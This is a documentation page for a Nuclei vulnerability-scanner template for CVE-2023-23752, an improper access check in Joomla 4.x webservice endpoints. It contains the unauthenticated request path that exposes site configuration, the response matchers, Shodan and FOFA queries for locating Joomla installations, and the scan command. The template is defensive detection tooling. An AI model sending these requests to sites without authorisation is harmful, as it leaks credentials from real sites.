Skip to content
Nuclei Templates

Joomla! Webservice - Password Disclosure

ID: CVE-2023-23752

Severity: medium

Author: badboycxcc,Sascha Brendel

Tags: cve,cve2023,joomla,kev

Description

Section titled “Description”

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

YAML Source

Section titled “YAML Source”
id: CVE-2023-23752


info:
  name: Joomla! Webservice - Password Disclosure
  author: badboycxcc,Sascha Brendel
  severity: medium
  description: |
    An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
  impact: |
    The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts.
  remediation: Upgrade to Joomla! version 4.2.8 or later.
  reference:
    - https://unsafe.sh/go-149780.html
    - https://twitter.com/gov_hack/status/1626471960141238272/photo/1
    - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23552
    - https://github.com/20142995/pocsuite3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-23752
    epss-score: 0.93208
    epss-percentile: 0.99053
    cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: joomla
    product: joomla\!
    shodan-query:
      - html:"Joomla! - Open Source Content Management"
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve,cve2023,joomla,kev


http:
  - method: GET
    path:
      - '{{BaseURL}}/api/index.php/v1/config/application?public=true'
      - '{{BaseURL}}/api/v1/config/application?public=true'


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"links":'
          - '"attributes":'
        condition: and


      - type: word
        part: header
        words:
          - 'application/json'
          - 'application/vnd.api+json'
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c284e50a985073b7aa871e95fb50765934cf5d394d13df9e2945043f96725e1022100d22e9c60147cffab2b8200f677cb0bbe7d890e035bfcf7fa3493056e41288f39:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-23752.yaml"

View on Github